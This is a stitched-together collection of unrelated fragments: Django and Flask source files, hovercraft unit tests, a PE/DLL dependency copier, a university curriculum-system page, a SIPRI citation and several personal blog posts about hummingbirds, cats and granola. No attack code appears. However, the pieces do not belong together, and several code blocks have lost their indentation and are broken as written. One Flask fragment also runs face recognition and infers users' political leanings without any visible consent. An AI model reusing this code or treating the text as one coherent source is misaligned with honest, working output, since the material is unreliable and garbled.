                       countries_not_found=country_not_found,
                       total_cities_found=[],
                       total_countries_found=country_found,
                       total_cities_not_found=[],
                       total_countries_not_found=country_not_found,
                       total_items_saved=total_items_saved
        )
        return {
            'url': '/admin/indicator/csvuploadlog/%s/' % str(log.id),
            'thumbnail_url': '',
            'id': str(log.id),
            'name' : title,
            'country_not_found' : log.countries_not_found,
            'total_countries_not_found' : country_not_found.__len__(),
            'city_not_found' : log.cities_not_found,
            'total_cities_not_found' : 0,
            'total_items_saved' : str(total_items_saved),
        }
    def delete_file(self, pk, request):
        '''
        Function to delete a file.
        '''
        # This is the default implementation.
        # NOTE(review): ModelAdmin.queryset() was replaced by get_queryset()
        # in newer Django releases -- verify against the Django version in
        # use before upgrading.
        obj = get_object_or_404(self.queryset(request), pk=pk)
        obj.delete()
# Register the UNESCO indicator models with the default admin site.
admin.site.register(UnescoIndicatorData, UnescoIndicatorDataUploadAdmin)
admin.site.register(UnescoIndicator)
|
Now THIS is a cool outdoor bathroom. No, it’s not Hef’s grotto. It’s from FaeMagazine. We’ve got a couple of outdoor bathtubs with hot and cold running water but what I love about this particular one is the stone surround and the plants. Next summer I’m going to have to do more landscaping, methinks.
|
import time
import json
import moment
from datetime import datetime
from django import forms
from base.models import sensors, controller_setpoints
from django.utils.translation import ugettext_lazy as _
from bootstrap3_datetime.widgets import DateTimePicker
# class DateForm(forms.Form):
# start_date = forms.DateField(
# widget=DateTimePicker())
# end_date = forms.DateField(
class DateForm(forms.Form):
    """Start/end date pickers bounded by the sensor data's time span.

    NOTE(review): the queries below run in the class body, i.e. once at
    import time -- the picker bounds stay frozen until the process
    restarts, and ``latest``/``earliest`` raise DoesNotExist when the
    sensors table is empty. Consider computing these in ``__init__``.
    """
    # Latest and earliest sensor readings; ``time`` appears to be a unix
    # timestamp (it is fed to datetime.fromtimestamp) -- confirm against
    # the sensors model.
    end = sensors.objects.latest('time')
    end_time = datetime.fromtimestamp(
        int(end.time)).strftime('%Y-%m-%d %H:%M')
    start = sensors.objects.earliest('time')
    start_time = datetime.fromtimestamp(
        int(start.time)).strftime('%Y-%m-%d %H:%M')
    start_date = forms.DateTimeField(
        widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
                                       "locale": "en",
                                       "minDate": start_time,
                                       "maxDate":end_time,
                                       "defaultDate": start_time,
                                       "sideBySide": True}))
    end_date = forms.DateTimeField(
        widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
                                       "locale": "en",
                                       "minDate": start_time,
                                       "maxDate":end_time,
                                       "defaultDate":end_time,
                                       "sideBySide": True}))
class ControlForm(forms.ModelForm):
    """Edit controller setpoints; light times use time-only pickers."""
    # "pickDate": 0 disables the date part of the picker (time of day only).
    lights_on = forms.TimeField(
        widget=DateTimePicker(options={"format": "HH:mm",
                                       "locale":"en",
                                       "pickDate":0}))
    lights_off = forms.TimeField(
        widget=DateTimePicker(options={"format": "HH:mm",
                                       "locale":"en",
                                       "pickDate":0}))
    class Meta:
        model = controller_setpoints
        fields = ['humidity','r1_water','r2_water','r3_water','water_frequency','lights_on','lights_off']
        labels = {
            "humidity":_("Relative Percent Humidity"),
            "r1_water":_("Number of Seconds to Water Row 1"),
            "r2_water":_("Number of Seconds to Water Row 2"),
            "r3_water":_("Number of Seconds to Water Row 3"),
            "water_frequency":_("How often to water in minutes"),
            "lights_on":_("What time of day to start the lights"),
            "lights_off":_("What time of day to turn off the lights")
        }
|
"." SIPRI Yearbook. SIPRI. Oxford: Oxford University Press. 2016. Web. 24 Apr. 2019. <https://www.sipriyearbook.org/view/9780198737810/sipri-9780198737810-miscMatter-5.xml>.
|
import os
import unittest
from pkg_resources import resource_string
from lxml import etree
from hovercraft.parse import rst2xml, SlideMaker
from hovercraft.position import gather_positions, calculate_positions, position_slides
TEST_DATA = os.path.join(os.path.split(__file__)[0], "test_data")
def make_tree(file_name):
    """Loads reStructuredText, outputs an lxml tree"""
    source = resource_string(__name__, os.path.join("test_data", file_name))
    xml, _deps = rst2xml(source)
    tree = etree.fromstring(xml)
    return SlideMaker(tree).walk()
class GatherTests(unittest.TestCase):
    """Tests that position information is correctly parsed"""

    def test_gathering(self):
        tree = make_tree("positioning.rst")
        positions = list(gather_positions(tree))

        def expected(is_path=False, path=None, **overrides):
            # Every field defaults to the relative no-op value "r0".
            position = {
                "data-x": "r0",
                "data-y": "r0",
                "data-z": "r0",
                "data-rotate-x": "r0",
                "data-rotate-y": "r0",
                "data-rotate-z": "r0",
                "data-scale": "r0",
                "is_path": is_path,
            }
            if path is not None:
                position["path"] = path
            position.update(overrides)
            return position

        path_d = "m 100 100 l 200 0 l 0 200"
        self.assertEqual(
            positions,
            [
                expected(**{"data-scale": "1"}),
                expected(**{"data-x": "r1600"}),
                expected(is_path=True, path=path_d, **{"data-x": "r1600"}),
                expected(is_path=True, **{"data-x": "r1600"}),
                expected(is_path=True, **{"data-x": "r1600"}),
                expected(**{"data-x": "0", "data-y": "0"}),
                expected(**{"data-rotate-z": "90"}),
                expected(),
                expected(is_path=True, path=path_d),
                expected(is_path=True),
                expected(is_path=True, **{"data-z": "1000", "data-rotate-x": "180"}),
                expected(**{"data-x": "3000", "data-y": "1000"}),
                expected(**{"data-x": "firstID+1000", "data-y": "firstID-500"}),
                expected(**{"data-x": "secondID+800", "data-y": "200"}),
            ],
        )
class CalculateTests(unittest.TestCase):
"""Tests that positions are correctly calculated"""
def test_square(self):
    # Slides, positioned in a square
    def absolute(x, y):
        return {
            "data-x": x,
            "data-y": y,
            "data-z": 0,
            "data-rotate-x": 0,
            "data-rotate-y": 0,
            "data-rotate-z": 0,
            "data-scale": 1,
        }

    positions = list(calculate_positions([
        {"data-x": "0", "data-y": "0"},
        {"data-x": "r1200", "data-y": "0"},
        {"data-x": "r1200", "data-y": "0"},
        {"data-x": "r1200", "data-y": "0"},
        {"data-x": "r0", "data-y": "r-1000"},
        {"data-x": "r0", "data-y": "r-1000"},
        {"data-x": "r0", "data-y": "r-1000"},
        {"data-x": "r-1200", "data-y": "r0"},
        {"data-x": "r-1200", "data-y": "r0"},
        {"data-x": "r-1200", "data-y": "r0"},
        {"data-x": "r0", "data-y": "r1000"},
        {"data-x": "r0", "data-y": "r1000"},
    ]))
    self.assertEqual(positions, [
        absolute(0, 0),
        absolute(1200, 0),
        absolute(2400, 0),
        absolute(3600, 0),
        absolute(3600, -1000),
        absolute(3600, -2000),
        absolute(3600, -3000),
        absolute(2400, -3000),
        absolute(1200, -3000),
        absolute(0, -3000),
        absolute(0, -2000),
        absolute(0, -1000),
    ])
def test_relative_positioning(self):
    # Relative positioning is probably the most useful positioning.
    # It allows you to insert or remove a slide, and everything adjusts.
    def absolute(x, y):
        return {
            "data-x": x,
            "data-y": y,
            "data-z": 0,
            "data-rotate-x": 0,
            "data-rotate-y": 0,
            "data-rotate-z": 0,
            "data-scale": 1,
        }

    positions = list(calculate_positions([
        # The first two slides are just default positons
        {"data-x": "r0", "data-y": "r0"},
        {"data-x": "r1600", "data-y": "r0"},
        # Then suddenly we move vertically!
        {"data-x": "r0", "data-y": "r1000"},
        # Continue the same way one slide.
        {"data-x": "r0", "data-y": "r1000"},
        # Stand still
        {"data-x": "r0", "data-y": "r0"},
        # Stand still again!
        {"data-x": "r0", "data-y": "r0"},
        # Move a little bit
        {"data-x": "r-40", "data-y": "r-200"},
        # Go back to normal movement to the right
        {"data-x": "r1600", "data-y": "r0"},
        {"data-x": "r1600", "data-y": "r0"},
        {"data-x": "r1600", "data-y": "r0"},
        # Absolute movement back to start!
        {"data-x": "0", "data-y": "0"},
        # Absolute movement to a center for end (with zoomout for example)
        {"data-x": "3000", "data-y": "1000"},
    ]))
    self.assertEqual(positions, [
        absolute(0, 0),
        absolute(1600, 0),
        absolute(1600, 1000),
        absolute(1600, 2000),
        absolute(1600, 2000),
        absolute(1600, 2000),
        absolute(1560, 1800),
        absolute(3160, 1800),
        absolute(4760, 1800),
        absolute(6360, 1800),
        absolute(0, 0),
        absolute(3000, 1000),
    ])
def test_absolute_path(self):
# Position slides along a path
positions = [
{
"data-x": "r0",
"data-y": "r0",
"path": "M 100 100 L 300 100 L 300 300",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"is_path": True},
{"is_path": True},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 4000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_relative_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r0", "data-y": "r2400"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
# This point is exactly on a 90 degree angle. Therefore,
# it's angle is calculated as 45 degrees, it being the
# average.
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 4800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_complex_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
# Note that we don't change the rotation, so it stays at 90, here.
{"data-x": "0", "data-y": "0"},
# No new x and y, previous was absolute: Stay still!
{},
{
"data-x": "r0",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"data-x": "3000", "data-y": "1000", "data-rotate-z": "0"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# Note that we don't change the rotation, so it stays at 90, here.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# No settings, still same place and rotation.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# We start a path, but x and y are r0, so no movement.
# However, the rotation will come from the path, so it resets to 0.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
class PositionTest(unittest.TestCase):
    """End-to-end positioning test driven by the positioning.rst fixture."""

    def test_complete(self):
        tree = make_tree("positioning.rst")
        # Position the slides, then collect every data-* attribute per step.
        position_slides(tree)
        positions = [
            {key: value for key, value in step.attrib.items()
             if key.startswith("data-")}
            for step in tree.findall("step")
        ]

        def pos(x, y, z="0", rx="0", rz="0"):
            # Expected attribute dict (all values are strings in the tree).
            return {"data-x": x, "data-y": y, "data-z": z,
                    "data-rotate-x": rx, "data-rotate-y": "0",
                    "data-rotate-z": rz, "data-scale": "1"}

        self.assertEqual(positions, [
            pos("0", "0"),
            pos("1600", "0"),
            # Because of the path, we now get an explicit rotation:
            pos("3200", "0"),
            pos("5600", "0", rz="44.99999999999999"),
            pos("5600", "2400", rz="90.0"),
            # Rotation carries over from last part of path.
            pos("0", "0", rz="90.0"),
            # No position change
            pos("0", "0", rz="90"),
            # No change at all.
            pos("0", "0", rz="90"),
            # Path starts, rotation comes from path:
            pos("0", "0"),
            pos("2400", "0", rz="44.99999999999999"),
            # Explicit rotate-x and z, automatic position including
            # rotate-z from path.
            pos("2400", "2400", z="1000", rx="180", rz="90.0"),
            # Explicit x and y, all other carry over from last slide.
            pos("3000", "1000", z="1000", rx="180", rz="90.0"),
            # Positioning relative to other slide by id
            pos("4000", "500", z="1000", rx="180", rz="90.0"),
            # Positioning x relative to other slide by id, explicit y
            pos("4800", "200", z="1000", rx="180", rz="90.0"),
        ])
# Allow running this test module directly: `python <module>.py`.
if __name__ == "__main__":
    unittest.main()
|
Firefox is the preferred browser for use with this system.
Only ECU faculty will be able to login to Curriculog.
Login requires an active Pirate ID and passphrase.
Please click the Login link to the top-right of this window to begin the login process. Enter your ECU credentials and click 'Sign in'.
Deadlines for curriculum changes to be included in the 2019-2020 Catalog.
Packages containing LEVEL I (only) action items MUST be through the UCC by March 14, 2019.
Packages containing LEVELS II & III action items MUST be through the UCC by February 28, 2019.
Packages containing LEVELS I, II & III (mixed) action items MUST be through the UCC by February 28, 2019.
Packages containing LEVEL I (only) action items MUST be through the GCC by March 20, 2019.
Packages containing LEVELS II & III action items MUST be through the GCC by February 20, 2019.
Committee meeting agendas fill up approximately two months in advance, so please plan accordingly. COMPLETED packages are put on UCC/GCC agendas in the order received and meeting time permitting. Note example: Even if your package is completed and reaches the GCC/UCC approval step by January 25, it does not guarantee your package will make it on an agenda prior to the deadline; therefore, it is recommended to have your package completed by January 1, 2019.
Curriculum changes approved by the UCC/GCC after the above deadlines will NOT be reflected in the 2019-2020 catalogs. No exceptions.
For proposal assistance, contact your college/department undergraduate or graduate liaison.
Curriculog is ECU’s curriculum and program management system.
Programs and courses are developed or revised, and then routed for review and approval by department, college, and university committees, all using Curriculog. Curriculog helps the institution provide transparency throughout the approval process, improves communication, allows faculty planners to track the progress of the package, and sends notifications to reviewers and approvers that action is needed. In addition, Curriculog integrates with Acalog and Banner to ensure consistent information across platforms and compliance with accreditors.
If you have a question or need system assistance, please contact the Curriculog System Administrator at curriculog@ecu.edu.
|
from . import config
from flask import Flask, request, render_template
import indicoio, requests
import ujson as json
from RedisLib import rds, R_SPEGILL_USER
import base64, hashlib
# Credentials and secrets live in the local `config` module.
indicoio.config.api_key = config.indico_api_key
app = Flask('spegill')
app.secret_key = config.password
# Identifier of the user currently talking; read by analyse_text().
# NOTE(review): never reassigned anywhere in this file — confirm it is
# updated elsewhere, otherwise it is always the empty string.
current_talking_user = ""
def append_to_redis_array(redis_key, new_entry):
    """Extend the JSON-encoded list stored under `redis_key` with the items
    of `new_entry` (a list), creating the key if it does not exist yet."""
    curr_redis_data = rds.get(redis_key)
    # BUG FIX: compare with `is None` (identity), not `== None`.
    if curr_redis_data is None:
        curr_redis_data = "[]"  # missing key: start from an empty list
    current_data = json.loads(curr_redis_data)
    current_data += new_entry
    rds.set(redis_key, json.dumps(current_data))
def get_external_link(file_hash):
    # Public URL under which the stored JPEG can be fetched (by Face++).
    return "{0}/{1}.jpg".format(config.external_host, file_hash)
def retrain_dataset():
    """Ask Face++ to retrain the 'main' person group; returns the raw reply."""
    url = ("https://apius.faceplusplus.com/v2/train/identify"
           "?api_secret={}&api_key={}&group_name=main").format(
        config.facepp_api_secret, config.facepp_api_key
    )
    return requests.get(url).text
# NOTE(review): module-level placeholder; not read or written anywhere
# visible in this file — confirm it is still needed.
current_user = None
@app.route("/text_data", methods=["GET", "POST"])
def analyse_text():
input_text = request.form["text"]
user_key = current_talking_user
action = request.form.get("action")
if action == "political":
indico_response = indicoio.analyze_text(input_text, apis=['political'])
political_party = indico_response["political"]
top_political_party = sorted(political_party.keys(), key=lambda x: political_party[x], reverse=True)[0]
return top_political_party
else:
indico_response = indicoio.analyze_text(input_text, apis=['keywords'])
keywords = indico_response["keywords"]
keywords_ = (sorted(keywords.keys(), key=lambda x: keywords[x], reverse=True)[:5])
return keywords_
@app.route("/image_create_person", methods=["GET", "POST"])
def create_person():
face_id_list = request.form.get("face_id_list")
obj_id_list = json.loads(face_id_list)
obj_csv_id_list = ",".join(obj_id_list)
post_url = config.facepp_compiled_person_path.format(obj_csv_id_list)
icp = requests.post(post_url)
return icp.text
@app.route("/update_user_data", methods=["GET", "POST"])
def update_user_data():
person_id = request.form.get("person_id")
user_dump = request.form.get("user_dump")
spegill_user_redis_key = R_SPEGILL_USER % person_id
rds.set(spegill_user_redis_key + ":dump", user_dump)
retrain_dataset()
return "OK"
@app.route("/image_recog_person", methods=["GET", "POST"])
def recog_person():
person_image_url = request.form.get("data_hash")
post_url = config.facepp_compiled_person_get_path.format(person_image_url)
irp = requests.post(post_url)
irpp = json.loads(irp.text)
try:
recog_first_match = irpp["face"][0]["candidate"][0]
recog_person_id = recog_first_match["person_id"]
recog_person_confidence = recog_first_match["confidence"]
if recog_person_confidence < 65:
return "NO MATCH"
spegill_user_redis_key = R_SPEGILL_USER % recog_person_id
result = rds.get(spegill_user_redis_key + ":dump")
return result
except:
return "ERR"
@app.route("/image_data", methods=["GET", "POST"])
def analyse_image():
image_b64 = request.form["b64_image"][22:]
img_data = base64.b64decode(image_b64)
h = hashlib.sha256()
h.update(image_b64)
file_hash = h.hexdigest()
filename = 'spegill/static/{}.jpg'.format(file_hash)
with open(filename, 'wb') as f:
f.write(img_data)
spegill_external_path = get_external_link(file_hash)
facepp_request_path = config.facepp_compiled_path.format(spegill_external_path)
r = requests.get(facepp_request_path)
return json.dumps({"o": r.text, "ha": spegill_external_path})
@app.route("/add")
def add_ads():
return render_template("add.html")
@app.route("/")
def root():
return render_template("video.html")
|
I’ve noticed the activity at the hummingbird feeders has recently dropped off dramatically. Rather than filling the six feeders on a daily basis, I am now filling them every two to three days. Initially I attributed the decline of the feeder activity to the hummingbirds moving on elsewhere. However, the more I began watching the feeders I noticed that a single male Anna’s Hummingbird was taking it upon himself to chase the other hummingbirds away from the feeders. He is very aggressive and has established three distinct perches created with mathematical precision forming a triangular perimeter to defend his claimed feeding grounds. I am quite impressed, but also somewhat discouraged as I watch the other hummingbirds being chased away from the feeders.
As it turns out I had photographed this hummingbird several times before. He was easy to identify since he is missing several tail feathers. After one of his first photo sessions I named him “forked-tail” (FT). It wasn’t until I started observing the feeders to learn the cause for the diminished feeder activity that I realized FT was the tyrant. Since FT was around during the heavy feeding activity, I’m still convinced that many of the hummingbirds have departed. With fewer hummingbirds to deal with it is now just easier for FT to control the feeder activity.
It has been interesting to watch the strategies of the hummingbirds attempting to use the feeders. Some come in low out of the view of FT, while others would come in pairs. As FT gives chase to one the other feeds quickly. FT feeds occasionally in between chase episodes. He seems to be doing a good job of protecting his feeding complex. FT most often gives chase to an incoming hummingbird before it reaches the feeders making it a real challenge to photograph the interactions.
There have been several other interesting FT encounters. A Lesser Goldfinch occupied one of FT’s three mathematically placed perches. FT tried without success to chase the goldfinch off the perch by repeatedly diving and hovering over the bird. FT chose one of the other two perches until the goldfinch left. I have not been immune to FT’s aggression. While standing too close to the feeders FT flew over and hovered near my knees, while moving back and forth horizontally in front of me while making repeated clicking calls. Obviously FT is unaware of who is refilling the feeder complex he has claimed as his own. Or perhaps he actually did know who filled the feeders and was just scolding me for not keeping them filled. Several of the feeders were empty at the time.
I’ve thought about spreading the feeders out making it more difficult for FT to defend them all. Noticing that FT was also chasing hummingbirds off the oriole feeder located some distance away, I realized that would probably not be a satisfactory solution.
It is obvious that such aggression and control is not an easy job at all. FT is in constant patrol mode from dusk til dawn daily.
Our cat VELCRO has befriended our next door neighbor’s cat KARTER. Our neighbor advised us earlier that KARTER had adopted them, not vice versa. They warned us that we should not let KARTER in our house or he would adopt us as well. VELCRO and KARTER have been meeting on a daily basis now through screened windows or doors. They usually meet nose to nose at the front window with KARTER on the brick ledge and VELCRO inside looking out.
Recently other neighborhood cats have been showing up to visit VELCRO but usually stay below the brick ledge of the front window. Several days ago I heard VELCRO making a tender “cooing” meow and went to see what was claiming his attention. Looking up at VELCRO from below the brick ledge was a beautiful black cat with green eyes. Hmm, I thought surely it must be a female cat based on the way VELCRO was acting. Of course, VELCRO being neutered, declawed (he was a rescue cat), and an indoor cat . . . . unfortunately for VELCRO, only in his dreams.
Last evening I noticed VELCRO and KARTER were engaging each other but KARTER was staring out away from VELCRO and VELCRO was looking intently out the side window. I approached VELCRO and began to pet him when he started hissing and growling while intently looking down out the window. Through the bushes I noticed an orange cat, then another. Out the front window two more cats arrived slowly walking across the grass heading towards KARTER and VELCRO. It was an amazing assemblage occurring all at the same time – like a scene from the movie Eclipse. All the time KARTER sat at the edge of the brick ledge overlooking the cats as they assembled on the yard below him. It was as if KARTER had called for the meeting to introduce VELCRO to the other neighborhood cats, or more likely to show off his harem and subjects to VELCRO. KARTER was also probably advising VELCRO to quit cooing with his green-eyed black cat lady friend. She was not present at this gathering.
". . Oh, those green eyes!"
I imagine keeping all the neighborhood cats in line is no easy task either. It is apparent that KARTER is the Top Cat in the neighborhood as we expected him to be the first time we met him. Now he’s proven it!
* STONEHURST is the housing development in Wildomar, CA where our home is located.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# DLL dependency resolution and copying script.
# Copyright (C) 2010 John Stumpo
# Copyright (C) 2014 Martin Müllenhaupt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import shutil
import struct
import sys
def is_pe_file(file):
    """Return True if `file` is an existing file with a valid PE signature,
    i.e. a DOS 'MZ' header whose e_lfanew field points at 'PE\\0\\0'."""
    if not os.path.isfile(file):  # Skip directories
        return False
    # BUG FIX: use a context manager; the handle was never closed before.
    with open(file, 'rb') as f:
        if f.read(2) != b'MZ':
            return False  # DOS magic number not present
        f.seek(60)
        raw_offset = f.read(4)
        # BUG FIX: a file shorter than 64 bytes made struct.unpack raise;
        # treat truncated headers as "not a PE file" instead.
        if len(raw_offset) != 4:
            return False
        peoffset = struct.unpack('<L', raw_offset)[0]
        f.seek(peoffset)
        if f.read(4) != b'PE\0\0':
            return False  # PE magic number not present
        return True
def get_imports(file):
    """Return the list of DLL names (str) imported by the PE file `file`.

    Parses the PE header manually: reads the COFF section table so RVAs can
    be mapped to file offsets, then walks the import descriptor table and
    resolves each referenced, NUL-terminated ASCII DLL name.
    """
    # BUG FIX: use a context manager; the handle was never closed before.
    with open(file, 'rb') as f:
        # We already know it's a PE, so don't bother checking again.
        f.seek(60)
        pe_header_offset = struct.unpack('<L', f.read(4))[0]
        # Get sizes of tables we need.
        f.seek(pe_header_offset + 6)
        number_of_sections = struct.unpack('<H', f.read(2))[0]
        f.seek(pe_header_offset + 116)
        number_of_data_directory_entries = struct.unpack('<L', f.read(4))[0]
        data_directory_offset = f.tell()  # it's right after the number of entries
        # Where is the import table? (entry 1 of the data directory)
        f.seek(data_directory_offset + 8)
        rva_of_import_table = struct.unpack('<L', f.read(4))[0]
        # Get the section ranges so we can convert RVAs to file offsets.
        f.seek(data_directory_offset + 8 * number_of_data_directory_entries)
        sections = []
        for i in range(number_of_sections):
            section_descriptor_data = f.read(40)
            name, size, va, rawsize, offset = \
                struct.unpack('<8sLLLL', section_descriptor_data[:24])
            sections.append({'min': va, 'max': va+rawsize, 'offset': offset})

        def seek_to_rva(rva):
            # Map a relative virtual address onto its on-disk position.
            for s in sections:
                if s['min'] <= rva and rva < s['max']:
                    f.seek(rva - s['min'] + s['offset'])
                    return
            raise ValueError('Could not find section for RVA.')

        # Walk the import table and get RVAs to the null-terminated names of
        # DLLs this file uses. The table is terminated by an all-zero entry.
        seek_to_rva(rva_of_import_table)
        dll_rvas = []
        while True:
            import_descriptor = f.read(20)
            if import_descriptor == b'\0' * 20:
                break
            # Offset 12 of each descriptor holds the RVA of the DLL name.
            dll_rvas.append(struct.unpack('<L', import_descriptor[12:16])[0])
        # Read the DLL names from the RVAs we found in the import table.
        dll_names = []
        for rva in dll_rvas:
            seek_to_rva(rva)
            name = b''
            while True:
                c = f.read(1)
                if c == b'\0':
                    break
                name += c
            dll_names.append(name.decode("ascii"))
        return dll_names
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Recursive copy of DLL dependencies')
parser.add_argument('targetdir',
type=str,
help='target directory where to place the DLLs')
parser.add_argument('-C',
'--checkdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='directories whose dependencies must be ' +
'fulfilled. All PE files will be checked ' +
'(mostly .exe and .dll files)',
dest='checkdirs')
parser.add_argument('-L',
'--libdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='include directories to search for DLL ' +
'dependencies (only .dll files will be used ' +
'from here)',
dest='libdirs')
args = parser.parse_args()
if sys.version_info < (3, 0):
from sets import Set as set
# Map from shortname ('qtcore4.dll') to full path (eg.
# '/.../mxe/i686-w64-mingw32.shared/qt/bin/QtCore4.dll')
available_dlls = dict()
# Remember already copied DLLs (eg 'qtcore4.dll', 'qtgui4.dll')
copied_dlls = set()
# Remember which DLLs must still be checked (eg 'qtnetwork4.dll',
# 'qtgui4.dll')
dlls_to_copy = set()
not_found_dlls = set()
# Create a list of all available .dll files in the libdir directories
# Flattening list: http://stackoverflow.com/questions/952914
for libdir in [item for sublist in args.libdirs for item in sublist]:
for dll_filename in os.listdir(libdir):
dll_filename_full = os.path.join(libdir, dll_filename)
if dll_filename.endswith('.dll') and is_pe_file(dll_filename_full):
available_dlls[dll_filename.lower()] = dll_filename_full
# Create a list of initial dependencies (dlls_to_copy) and already copied
# DLLs (copied_dlls) from the checkdir arguments.
# Flattening list: http://stackoverflow.com/questions/952914
for checkdir in [item for sublist in args.checkdirs for item in sublist]:
for pe_filename in os.listdir(checkdir):
pe_filename_full = os.path.join(checkdir, pe_filename)
if is_pe_file(pe_filename_full):
for dependency_dll in get_imports(pe_filename_full):
dlls_to_copy.add(dependency_dll.lower())
if pe_filename.endswith('.dll'):
copied_dlls.add(pe_filename.lower())
while len(dlls_to_copy):
# We may not change the set during iteration
for dll_to_copy in dlls_to_copy.copy():
if dll_to_copy in copied_dlls:
None
elif dll_to_copy in not_found_dlls:
None
elif dll_to_copy in available_dlls:
shutil.copyfile(available_dlls[dll_to_copy],
os.path.join(args.targetdir,
os.path.basename(available_dlls[dll_to_copy])))
copied_dlls.add(dll_to_copy.lower())
for dependency_dll in get_imports(available_dlls[dll_to_copy]):
dlls_to_copy.add(dependency_dll.lower())
else:
not_found_dlls.add(dll_to_copy)
dlls_to_copy.remove(dll_to_copy)
print("Missing dll files: " + ", ".join(not_found_dlls))
|
Well, I made granola today, which was great, but the smell of it cooking gave me a kind-of migraine. Yuck!
Anyway, fun-filled update on granola tomorrow.
Oh no! I hope it goes away soon! I always feel gross when I’m around coffee roasting.
weird … well, cutting onions gives me a headache. that’s weird, too. btw … can you post an easy winter squash recipe on my blog if you get the chance?
|
# -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Vincent Paredes
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
